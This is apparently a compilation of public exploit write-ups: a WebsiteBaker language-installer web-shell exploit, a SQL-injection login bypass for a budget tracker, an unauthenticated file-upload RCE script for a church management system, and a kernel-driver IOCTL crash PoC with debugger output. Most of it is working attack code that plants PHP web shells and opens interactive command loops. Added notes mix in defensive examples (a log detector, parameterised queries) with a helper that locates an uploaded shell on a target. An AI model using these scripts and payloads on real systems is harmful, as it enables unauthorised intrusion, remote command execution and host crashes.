	if title == "Enter your website title » Administration - Add-ons":
		find_token(args, phpsessid_name, new_cookie)
	else:
		print("[!] Unauthorized user!\n\n")
		print("Requires user with language editing permissions.")
		sleep(2)
		exit(1)


def find_token(args, phpsessid_name, new_cookie):
	url = args.host + "/admin/languages/index.php"
	cookies = {
		"klaro": "{'klaro':true,'mathCaptcha':true}",
		phpsessid_name : new_cookie
	}
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	response = requests.get(url, headers=headers, cookies=cookies)
	soup = BeautifulSoup(response.text, 'html.parser')
	token_hidden_name = soup.find_all("input", type="hidden")[5].get("name")
	token_hidden_value = soup.find_all("input", type="hidden")[5].get("value")


	if soup.find_all("option")[1].text == "":
		exploit(args)
	elif soup.find_all("option")[20].text == "Türkçe":
		token_lang = soup.find_all("option")[20].get("value")
		uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang)
	else:
		install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value)
		pass


def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value):
	url = args.host + "/admin/languages/install.php"
	cookies = {
		"klaro": "{'klaro':true,'mathCaptcha':true}",
		phpsessid_name: new_cookie
	}

	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/admin/languages/index.php",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}

	# The installer treats the upload as a language pack and drops it under
	# /languages/, so the "language file" is a minimal PHP web shell.
	# requests builds the multipart body and the boundary Content-Type itself.
	data = {
		"action": "install",
		"advanced": '',
		token_hidden_name: token_hidden_value,
		"submit": "Install",
		"overwrite": "true"
	}
	files = {
		"userfile": ("TR.php", "<?php system($_GET['cmd']); ?>\n", "application/x-php")
	}
	response = requests.post(url, headers=headers, cookies=cookies, data=data, files=files)
	print("[!] Installing Vuln Lang File!\n")
	sleep(2)
	find_token(args, phpsessid_name, new_cookie)



def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang):

	url = args.host + "/admin/languages/uninstall.php"
	cookies = {
		"klaro": "{'klaro':true,'mathCaptcha':true}",
		phpsessid_name: new_cookie
	}
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "application/x-www-form-urlencoded",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/admin/languages/index.php",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	data = {
		"action": "uninstall",
		"advanced": '',
		token_hidden_name : token_hidden_value,
		"file": token_lang,
		"submit": "Uninstall"
	}
	response = requests.post(url, headers=headers, cookies=cookies, data=data)
	soup = BeautifulSoup(response.text, 'html.parser')
	print("[!] Uninstall Lang File!\n")
	# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
	sleep(2)
	find_token(args, phpsessid_name, new_cookie)



def exploit(args):
	shell = args.host + "/languages/TR.php"
	headers = {
		"Upgrade-Insecure-Requests": "1",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
	}
	# A 200 here means a shell from this or an earlier run is already in place
	response = requests.get(shell, headers=headers, params={"cmd": "whoami"})
	if response.status_code == 200:
		print("[*] Exploit File Exists!\n")
		sleep(2)
		print("[+] Exploit Done!\n")
		sleep(2)

		while True:
			cmd = input("$ ")
			# Pass the command via params so spaces, quotes and & are URL-encoded;
			# the shell reads $_GET, so a GET request is what it expects
			response = requests.get(shell, headers=headers, params={"cmd": cmd}, timeout=5)

			if response.text == "":
				print(cmd + ": command not found\n")
			else:
				print(response.text)

if __name__ == '__main__':
	main()
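The chain above leaves two distinctive entries in the web server log: a POST to /admin/languages/install.php followed, from the same client, by a request to a PHP file under /languages/ carrying a query string. The following is an added example, not part of the original exploit or of WebsiteBaker, that pulls those out of Apache combined-format access log lines; the sample log lines are constructed for the example and the paths are the ones the script uses.

```python
import re
from collections import defaultdict

# Apache "combined" log format: client, ident, user, [timestamp], "METHOD path proto", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

INSTALLER = "/admin/languages/install.php"
# Language files are PHP includes; a direct request with a query string is not normal traffic
LANG_PHP = re.compile(r"^/languages/[^/?]+\.php\?")


def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_language_installer_abuse(lines):
    """Alert on clients that request a PHP file under /languages/ with a query string,
    and note whether the same client POSTed to the language installer earlier."""
    installed = defaultdict(list)   # ip -> timestamps of installer POSTs seen so far
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith(INSTALLER):
            installed[rec["ip"]].append(rec["ts"])
        elif LANG_PHP.match(rec["path"]):
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["path"],
                "status": rec["status"],
                "after_install": bool(installed.get(rec["ip"])),
            })
    return alerts


# Constructed sample log: one full login -> install -> execute chain from 10.0.0.7,
# and a lone shell request from 10.0.0.9 (a shell planted in an earlier session).
SAMPLE_LOG = [
    '10.0.0.7 - - [18/Sep/2021:12:01:03 +0000] "POST /admin/login/index.php HTTP/1.1" 302 -',
    '10.0.0.7 - - [18/Sep/2021:12:01:09 +0000] "GET /admin/languages/index.php HTTP/1.1" 200 5120',
    '10.0.0.7 - - [18/Sep/2021:12:01:12 +0000] "POST /admin/languages/install.php HTTP/1.1" 200 4870',
    '10.0.0.7 - - [18/Sep/2021:12:01:15 +0000] "GET /languages/TR.php?cmd=whoami HTTP/1.1" 200 12',
    '10.0.0.9 - - [18/Sep/2021:12:03:40 +0000] "GET /pages/welcome.php HTTP/1.1" 200 8192',
    '10.0.0.9 - - [18/Sep/2021:12:03:44 +0000] "GET /languages/EN.php?cmd=id HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for alert in find_language_installer_abuse(SAMPLE_LOG):
        print(alert)
```

An alert with after_install set is the full chain; one without it is a shell that was already present, which is exactly the case the script's own exploit() check handles first.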
            
# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
Budget and Expense Tracker System 1.0 is prone to an easy authentication bypass: the admin
login form passes the username straight into the SQL query, so an SQL injection payload in
the username field logs the attacker in as the admin account without knowing its password.
Assuming the usual WHERE username = '$user' AND password = '$pass' query shape, the injected
text is parsed as username = 'admin' OR (''=' --' AND password = '...'): the comment marker
ends up inside a string literal, and the payload works because an account named admin exists.
Put another existing username in front of the quote to log in as that user instead.


----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/expense_budget/admin/login.php

Username: admin' or ''=' --
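The following added example (not vendor code) reproduces that reasoning against an in-memory SQLite table: the same payload is run through a string-concatenated query and through a parameterised one, and also with a username that does not exist, which is the case where the payload fails. The query shape and the user table are assumptions made for the example.

```python
import sqlite3

# Constructed sample data; the login query shape is an assumption about the
# application's admin/login.php, not code from the vendor.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, type INTEGER);
INSERT INTO users VALUES (1, 'admin', 'SecretPass123', 1);
INSERT INTO users VALUES (2, 'alice', 'hunter2', 2);
"""

PAYLOAD = "admin' or ''=' --"   # the PoC username from above


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def effective_sql(username, password):
    """The SQL text the vulnerable query actually sends, for inspection."""
    return ("SELECT id, username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_concatenated(conn, username, password):
    """Vulnerable pattern: user input is spliced into the SQL text."""
    return conn.execute(effective_sql(username, password)).fetchone()


def login_parameterized(conn, username, password):
    """Hardened pattern: the driver binds values, so quotes are just data."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def demo():
    conn = fresh_db()
    return {
        # username = 'admin' OR (''=' --' AND password = 'wrong')  -> admin row
        "vulnerable": login_concatenated(conn, PAYLOAD, "wrong"),
        # the whole payload is compared as one literal username -> no row
        "parameterized": login_parameterized(conn, PAYLOAD, "wrong"),
        # the OR branch is false, so the bypass needs the named account to exist
        "vulnerable_unknown_user": login_concatenated(conn, "nobody' or ''=' --", "wrong"),
    }


if __name__ == "__main__":
    print(effective_sql(PAYLOAD, "wrong"))
    for name, row in demo().items():
        print(f"{name}: {row}")
```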
            
# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-20
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Church Management System (CMS-Website) 1.0 suffers from an unauthenticated file upload vulnerability: the user-save endpoint accepts any file as the profile image, so a remote attacker can upload a PHP file and gain Remote Code Execution (RCE) on the hosting web server.

# Exploit Details:

# 1. Access 'classes/Users.php'; it does not check for an authenticated user session.
# 2. Set the 'f' parameter of the POST request to 'save'.
#     - `Users.php?f=save`
# 3. Capture the request in Burp and replace it with the following request.
'''
POST /church_management/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550
Content-Length: 859
Origin: http://localhost
Connection: close
Referer: http://localhost/church_management/admin/?page=user
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="id"

1
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="firstname"

Adminstrator
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="lastname"

Admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="username"

admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="password"


-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php echo phpinfo(); ?>
-----------------------------91105564325608762312322546550--

'''
#   The image uploader renames your payload using the following function:
         # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
         # i.e. the Unix time of the current minute on the server, an underscore, and the original file name.
         # You can simply go to any online PHP compiler such as https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
         # and print this function to get the value, e.g. <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200
         # Concatenate the output with your payload name like this: 1632085200_phpinfo.php
         # The value comes from the target's clock, not yours: if the two disagree, or the upload lands
         # on a minute boundary, the name is off by a multiple of 60, so try the neighbouring minutes too.
# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET requests.

# RCE via executing exploit:
    # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py
    # Step 2: Input the URL of the vulnerable application, e.g. http://localhost/church_management/


import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

header = Style.BRIGHT+Fore.RED+'              '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL

print(Style.BRIGHT+"               Church Management System v1.0")
print(Style.BRIGHT+"            Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)

print(r"""

                        
                                                                                 .----------. 
                                                                 .-''-.         /          /  
     .                            __  __   ___                 .' .-.  )       /   ______.'   
   .'|                           |  |/  `.'   `.              / .'  / /       /   /_          
 .'  |                           |   .-.  .-.   '            (_/   / /       /      '''--.    
<    |            __        __   |  |  |  |  |  | ,.----------.   / /       '___          `.  
 |   | ____    .:--.'.   .:--.'. |  |  |  |  |  |//            \ / /            `'.         | 
 |   | \ .'   / |   \ | / |   \ ||  |  |  |  |  |\\            /. '                )        | 
 |   |/  .    `" __ | | `" __ | ||  |  |  |  |  | `'----------'/ /    _.-')......-'        /  
 |    /\  \    .'.''| |  .'.''| ||__|  |__|  |__|            .' '  _.'.-'' \          _..'`   
 |   |  \  \  / /   | |_/ /   | |_                          /  /.-'_.'      '------'''        
 '    \  \  \ \ \._,\ '/\ \._,\ '/                         /    _.'                           
'------'  '---'`--'  `"  `--'  `"                         ( _.-'                              

                            abdullahkhawaja.com
            """)



GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}



s = requests.Session()

# Any session id works: Users.php?f=save never checks for a logged-in user
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK = input("Enter URL of The Vulnerable Application : ")
# The upload and shell paths are appended directly, so make sure the base URL ends with '/'
LINK = LINK.rstrip('/') + '/'


def webshell(LINK, session):
    try:
        WEB_SHELL = LINK+'uploads/'+filename
        # The prompt is built from 'echo %CD%', which only yields a path on a Windows
        # target; on anything else fall back to a plain '$ ' prompt instead of aborting.
        getdir  = {'cmd': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall(r'[A-Z]:\\.*', r2.text)
        cwd = cwd[0]+"> " if cwd else "$ "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = session.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            print(r2.text)
    except (KeyboardInterrupt, EOFError, requests.RequestException):
        print("\r\nExiting.")
        sys.exit(-1)


#Creating a PHP Web Shell

phpshell  = {
               'img': 
                  (
                   'shell.php', 
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 
                   'application/octet-stream', 
                  {'Content-Disposition': 'form-data'}
                  ) 
             }

# Defining value for form data
data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}


def id_generator():
    # Mirror the server-side rename: strtotime(date('y-m-d H:i')) is the Unix time of the
    # current minute, so truncate local time to the minute and take its epoch value.
    # This uses the attacker's clock; if it drifts from the target's, try the adjacent minutes.
    now = datetime.datetime.now().replace(second=0, microsecond=0)
    return str(int(now.timestamp())) + '_shell.php'

filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data)

# The PHP notice in the response is used as the success signal; it is only present when
# the target displays errors, so a missing notice does not by itself mean the upload failed
shell_upload = "Undefined index: id in" in upload.text
if shell_upload:
    print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
    print(RED+"[-]Failed To Upload The PHP Shell!", RESET)



#Executing The Webshell
webshell(LINK, s)
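The stored file name depends on the target's clock, and the script above computes it from the attacker's, so the two can disagree by a minute. The following added example (not part of the original exploit) derives the server's time from the HTTP Date header that any response from the target carries, produces the candidate names around that minute, and probes them; the Date header value used in the usage call is constructed to match the worked value above (1632085200), and the rename rule it mirrors is the one quoted from the uploader.

```python
from datetime import timezone
from email.utils import parsedate_to_datetime
from urllib.parse import quote
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

# Assumed rename rule (quoted from the uploader above):
#   strtotime(date('y-m-d H:i')) . '_' . <original file name>
# i.e. the Unix time of the current minute on the target, which depends on its clock.


def minute_epoch(server_time):
    """Unix time of the minute containing server_time (an aware datetime)."""
    floored = server_time.replace(second=0, microsecond=0)
    return int(floored.timestamp())


def server_time_from_date_header(date_header):
    """Parse an HTTP Date header (RFC 7231 format) into an aware UTC datetime."""
    return parsedate_to_datetime(date_header).astimezone(timezone.utc)


def candidate_names(original_name, server_time, skew_minutes=0):
    """Names the upload may have been stored under, most likely first.

    skew_minutes widens the search to neighbouring minutes, for the case where the
    request straddled a minute boundary or the Date header came from a proxy.
    """
    base = minute_epoch(server_time)
    offsets = [0]
    for k in range(1, skew_minutes + 1):
        offsets += [-k, k]
    return [f"{base + 60 * off}_{original_name}" for off in offsets]


def probe_for_shell(base_url, names, timeout=5):
    """GET uploads/<name>?cmd=... for each candidate and return the first one served.

    Makes real requests; base_url is a hypothetical target supplied by the caller.
    """
    for name in names:
        url = f"{base_url.rstrip('/')}/uploads/{quote(name)}?cmd={quote('echo ok')}"
        try:
            with urlopen(Request(url, headers={"User-Agent": "probe"}), timeout=timeout) as resp:
                if resp.status == 200:
                    return name
        except (HTTPError, URLError):
            continue
    return None


if __name__ == "__main__":
    # Constructed Date header; in practice read it from the upload response, e.g.
    # server_time_from_date_header(upload.headers["Date"])
    t = server_time_from_date_header("Sun, 19 Sep 2021 21:00:30 GMT")
    print(candidate_names("phpinfo.php", t, skew_minutes=1))
```

Reading the Date header from the upload response itself gives the closest estimate, since it is generated on the same host and in the same second as the rename.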
            
# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
# Date: 2021/04/07
# Exploit Author: Quadron Research Lab
# Version: all versions
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr
#
# Sending 2000 bytes to IOCTL 0x22245C of \\.\GM312Fltr overruns a stack buffer in the
# driver's handler; the /GS security-cookie check catches the corruption and bugchecks the
# machine with DRIVER_OVERRAN_STACK_BUFFER (0xF7), as the dump below shows. Any process that
# can open the device can therefore crash the host; turning the overrun into code execution
# would require defeating the stack cookie and is not demonstrated here.

import sys
from ctypes import windll, create_string_buffer, byref, c_ulong, c_void_p

devicename = "GM312Fltr"

# IOCTL that crashes the driver; the other codes are the ones listed in the original PoC
ioctl = 0x22245C

ioctl_list = [
    0x22245C, 0x222440, 0x222441, 0x222400, 0x222404, 0x222408,
    0x222420, 0x222424, 0x222448, 0x222450, 0x222460,
]

kernel32 = windll.kernel32
kernel32.CreateFileA.restype = c_void_p
INVALID_HANDLE_VALUE = c_void_p(-1).value

# Open the device with GENERIC_READ | GENERIC_WRITE (0xC0000000) and OPEN_EXISTING (0x3).
# CreateFileA takes a byte string; passing a Python 3 str would hand it UTF-16 data.
hevDevice = kernel32.CreateFileA(b"\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == INVALID_HANDLE_VALUE:
    print("Could not open \\\\.\\GM312Fltr (driver not loaded, or not Windows)")
    sys.exit(1)

print("OPENED!")

# 2000 bytes of 'A' is far larger than the handler's stack buffer; the /GS cookie check
# detects the overrun and the machine bugchecks with DRIVER_OVERRAN_STACK_BUFFER (0xF7).
bufLength = 2000
buf = create_string_buffer(b"A" * bufLength, bufLength)
bytesReturned = c_ulong()

kernel32.DeviceIoControl(c_void_p(hevDevice), ioctl, buf, bufLength, None, 0, byref(bytesReturned), None)
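Before fuzzing or triaging a driver IOCTL it helps to split the code into the fields Windows packs it from, because they say who may send it (the access bits) and how the input buffer reaches the driver (the method bits). The following is an added example, not part of the Quadron PoC, that decodes the codes listed above using the CTL_CODE layout from winioctl.h; FILE_DEVICE_UNKNOWN (0x22) is the only device-type name it resolves.

```python
from collections import namedtuple

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
IoctlInfo = namedtuple("IoctlInfo", "device_type function method access")

METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
FILE_DEVICE_UNKNOWN = 0x22


def ctl_code(device_type, function, method, access):
    """Same packing as the CTL_CODE macro in winioctl.h."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    return IoctlInfo(
        device_type=(code >> 16) & 0xFFFF,
        function=(code >> 2) & 0xFFF,
        method=code & 0x3,
        access=(code >> 14) & 0x3,
    )


def describe(code):
    info = decode_ioctl(code)
    dev = "FILE_DEVICE_UNKNOWN" if info.device_type == FILE_DEVICE_UNKNOWN else hex(info.device_type)
    return (f"0x{code:06X}: device={dev} function=0x{info.function:03X} "
            f"{METHOD_NAMES[info.method]} {ACCESS_NAMES[info.access]}")


# IOCTL codes from the PoC above, crashing one first
GM312_IOCTLS = [0x22245C, 0x222440, 0x222441, 0x222400, 0x222404, 0x222408,
                0x222420, 0x222424, 0x222448, 0x222450, 0x222460]


def any_access_buffered(codes):
    """Codes that require no specific access right on the handle and deliver the
    caller's data through a system-buffer copy (METHOD_BUFFERED), which the driver
    then has to size-check itself; the crashing code 0x22245C is one of these."""
    return [c for c in codes
            if decode_ioctl(c).access == 0 and decode_ioctl(c).method == 0]


if __name__ == "__main__":
    for c in GM312_IOCTLS:
        print(describe(c))
```

0x22245C decodes to CTL_CODE(FILE_DEVICE_UNKNOWN, 0x917, METHOD_BUFFERED, FILE_ANY_ACCESS): the I/O manager copies the 2000 input bytes into a system buffer of that length, and the driver's handler then copies them into a fixed stack buffer without checking InputBufferLength, which is what the 0xF7 bugcheck below records.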

[Bugcheck Analysis]
*** Fatal System Error: 0x000000f7
                       (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff807`2e1feb90 cc                      int     3
0: kd> !analyze -v
Connected to Windows 10 19041 x64 target at (Mon Jun 14 20:48:16.370 2021 (UTC + 2:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
........................

Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
Run !sym noisy before .reload to track down problems loading symbols.

........................................
.............................
Loading User Symbols
.............................................
Loading unloaded module list
........

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************


DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: bebea1caeaf0a2c1, Actual security check cookie from the stack
Arg2: 0000f80736bc1742, Expected security check cookie
Arg3: ffff07f8c943e8bd, Complement of the expected security check cookie
Arg4: 0000000000000000, zero

Debugging Details:
------------------


BUGCHECK_CODE:  f7

BUGCHECK_P1: bebea1caeaf0a2c1

BUGCHECK_P2: f80736bc1742

BUGCHECK_P3: ffff07f8c943e8bd

BUGCHECK_P4: 0

PROCESS_NAME:  pythonw.exe

SYMBOL_NAME:  GM312Fltr+e1e

MODULE_NAME: GM312Fltr

IMAGE_NAME:  GM312Fltr.sys

FAILURE_BUCKET_ID:  0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function

FAILURE_ID_HASH:  {b8e05604-2a11-789a-ad29-fc4916710f2d}

Followup:     MachineOwner
---------

0: kd> kb
RetAddr           : Args to Child                                                           : Call Site
fffff807`2e312d12  fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000  nt!DbgBreakPointWithStatus
fffff807`2e3122f6  00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7  nt!KiBugCheckDebugBreak+0x12
fffff807`2e1f6df7  fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8  nt!KeBugCheck2+0x946
fffff807`36bc0e1e  00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd  nt!KeBugCheckEx+0x107
fffff807`36bc0ea7  fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720  GM312Fltr+0xe1e
fffff807`2e1ffbaf  fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000  GM312Fltr+0xea7
fffff807`2e087547  fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d  nt!RtlpExecuteHandlerForException+0xf
fffff807`2e086136  ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0  nt!RtlDispatchException+0x297
fffff807`2e1f7b82  00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000  nt!KiDispatchException+0x186
fffff807`2e1f7b50  fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010  nt!KxExceptionDispatchOnExceptionStack+0x12
fffff807`2e208da5  00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246  nt!KiExceptionDispatchOnExceptionStackContinue
fffff807`2e204ae0  ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000  nt!KiExceptionDispatch+0x125
fffff807`2e1fe0c7  fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710  nt!KiGeneralProtectionFault+0x320
fffff807`2e1fda76  7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000  nt!SwapContext+0x377
fffff807`2e00c970  ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498  nt!KiSwapContext+0x76
fffff807`2e00be9f  ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000  nt!KiSwapThread+0x500
fffff807`2e00b743  ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0  nt!KiCommitThreadWait+0x14f
fffff807`36bc0ca2  ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100  nt!KeWaitForSingleObject+0x233
fffff807`36bc0b5d  ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017  GM312Fltr+0xca2
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  GM312Fltr+0xb5d
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
